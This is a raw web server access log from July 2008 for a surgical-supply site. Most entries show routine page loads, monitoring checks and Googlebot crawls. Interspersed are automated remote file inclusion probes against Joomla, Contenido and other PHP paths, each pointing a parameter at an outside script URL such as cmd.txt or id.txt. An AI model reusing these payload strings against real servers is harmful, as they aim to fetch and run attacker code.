24.110.120.68 - - [15/Jul/2008:03:06:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
24.110.120.68 - - [15/Jul/2008:03:06:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
209.59.12.99 - - [15/Jul/2008:03:06:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.194.67.123 - - [15/Jul/2008:03:07:01 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.amigosdelajedrezporoaxaca.org//components/com_extcalendar/lib/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
82.194.67.123 - - [15/Jul/2008:03:07:01 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.amigosdelajedrezporoaxaca.org//components/com_extcalendar/lib/id.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
87.101.4.49 - - [15/Jul/2008:03:08:27 -0400] "GET /logs/administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.ritewaycharityservices.com/id.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
87.101.4.49 - - [15/Jul/2008:03:08:28 -0400] "GET /administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.ritewaycharityservices.com/id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
87.101.4.49 - - [15/Jul/2008:03:08:29 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ritewaycharityservices.com/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
87.101.4.49 - - [15/Jul/2008:03:08:29 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ritewaycharityservices.com/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
209.59.12.99 - - [15/Jul/2008:03:11:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [15/Jul/2008:03:16:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
205.234.197.170 - - [15/Jul/2008:03:17:01 -0400] "GET /logs//send_reminders.php?includedir=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.813"
205.234.197.170 - - [15/Jul/2008:03:17:01 -0400] "GET //send_reminders.php?includedir=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.813"
66.7.193.54 - - [15/Jul/2008:03:17:58 -0400] "GET /logs//index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.810"
66.7.193.54 - - [15/Jul/2008:03:18:00 -0400] "GET //index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.810"
66.249.73.25 - - [15/Jul/2008:03:18:20 -0400] "GET /logs/access_log.Q107111100 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.36.175.146 - - [15/Jul/2008:03:19:00 -0400] "GET /logs//index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.811"
72.36.175.146 - - [15/Jul/2008:03:19:01 -0400] "GET //index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.811"
66.161.131.250 - - [15/Jul/2008:03:19:39 -0400] "GET /logs//index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.64"
66.161.131.250 - - [15/Jul/2008:03:19:39 -0400] "GET //index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.64"
201.130.79.38 - - [15/Jul/2008:03:19:48 -0400] "GET /logs//index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
201.130.79.38 - - [15/Jul/2008:03:19:49 -0400] "GET //index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
209.59.12.99 - - [15/Jul/2008:03:21:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.47.205.18 - - [15/Jul/2008:03:22:57 -0400] "GET /logs//send_reminders.php?includedir=http://geocities.com/lase_keren/cmd.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
72.47.205.18 - - [15/Jul/2008:03:22:57 -0400] "GET //send_reminders.php?includedir=http://geocities.com/lase_keren/cmd.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
66.249.73.25 - - [15/Jul/2008:03:23:21 -0400] "GET /logs/error_log.Q107090900 HTTP/1.1" 200 22648 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.110.54.240 - - [15/Jul/2008:03:24:35 -0400] "GET /logs/home.php?pagina=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
217.110.54.240 - - [15/Jul/2008:03:24:36 -0400] "GET /home.php?pagina=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
209.59.12.99 - - [15/Jul/2008:03:26:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.246.29.107 - - [15/Jul/2008:03:31:05 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
216.246.29.107 - - [15/Jul/2008:03:31:05 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
216.246.29.107 - - [15/Jul/2008:03:31:08 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
216.246.29.107 - - [15/Jul/2008:03:31:08 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
209.59.12.99 - - [15/Jul/2008:03:31:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.93.62.106 - - [15/Jul/2008:03:33:21 -0400] "GET /logs//index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
80.93.62.106 - - [15/Jul/2008:03:33:21 -0400] "GET //index.phpmain.php?x=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/Jul/2008:03:36:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.25 - - [15/Jul/2008:03:37:01 -0400] "GET /logs/ HTTP/1.1" 200 57430 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.200.57.2 - - [15/Jul/2008:03:41:28 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.200.57.2 - - [15/Jul/2008:03:41:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.200.57.2 - - [15/Jul/2008:03:41:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.200.57.2 - - [15/Jul/2008:03:41:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9) Gecko/2008052906 Firefox/3.0"
209.59.12.99 - - [15/Jul/2008:03:41:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [15/Jul/2008:03:46:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.145.254.4 - - [15/Jul/2008:03:50:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:50:30 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:50:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:50:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
209.59.12.99 - - [15/Jul/2008:03:51:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.145.254.4 - - [15/Jul/2008:03:52:12 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant HTTP/1.1" 200 58783 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:14 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:14 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:14 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:14 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:15 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:15 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:15 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:16 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:16 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:16 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:18 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:18 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:18 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:18 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:18 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:18 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:18 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:19 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:19 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:21 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:21 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:24 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:24 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:24 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:24 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:25 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:25 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:37 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:37 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
193.145.254.4 - - [15/Jul/2008:03:52:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
66.249.73.25 - - [15/Jul/2008:03:55:45 -0400] "GET /logs/error_log.Q108061500 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [15/Jul/2008:03:56:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [15/Jul/2008:04:01:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [15/Jul/2008:04:07:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [15/Jul/2008:04:12:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.25 - - [15/Jul/2008:04:14:28 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02 HTTP/1.1" 200 53109 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [15/Jul/2008:04:17:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [15/Jul/2008:04:22:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [15/Jul/2008:04:27:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.25 - - [15/Jul/2008:04:32:42 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.25 - - [15/Jul/2008:04:32:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LEF905B2D64E1D9004A25060+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.25 - - [15/Jul/2008:04:32:52 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LEF905B2D6491B9004A25060+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.25 - - [15/Jul/2008:04:33:03 -0400] "GET /logs/access_log.Q108062600 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [15/Jul/2008:04:33:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.25 - - [15/Jul/2008:04:38:04 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LEF905B2D6461E9004A25060+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [15/Jul/2008:04:38:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [15/Jul/2008:04:43:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.25 - - [15/Jul/2008:04:44:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LEF905B2D644199004A25060+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [15/Jul/2008:04:48:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.25 - - [15/Jul/2008:04:50:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LEF905B2D650199004E25060+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.25 - - [15/Jul/2008:04:51:46 -0400] "GET /logs/access_log.Q108062800 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
